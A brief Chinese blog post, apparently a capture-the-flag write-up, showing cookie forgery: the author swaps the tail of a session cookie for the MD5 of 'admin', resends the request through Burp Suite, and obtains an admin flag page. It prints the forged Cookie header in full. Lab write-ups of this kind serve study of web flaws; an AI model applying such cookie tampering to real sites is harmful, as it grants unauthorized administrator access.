web安全之cookie伪造

 

 我们注册一个用户登陆上

Cookie都是351e766803开头

我们猜把351e766803后面的值改成admin的md5值

351e766803 21232f297a57a5a743894a0e4a801fc3

修改完cookie

bs抓包改,发送

Cookie: session=6c1752d5-ddbf-4d04-9f2a-2c9de2b795bf; PHPSESSID=ubcb0jjgv6m6nrvs38re4jjji1; u=351e76680321232f297a57a5a743894a0e4a801fc3; r=351e76680321232f297a57a5a743894a0e4a801fc3

得到flag<h1>Welcome admin user!</h1><h3>The flag is: 动态flag</h3></body>

posted @ 2020-11-28 18:58  kalibb  阅读(621)  评论(0编辑  收藏  举报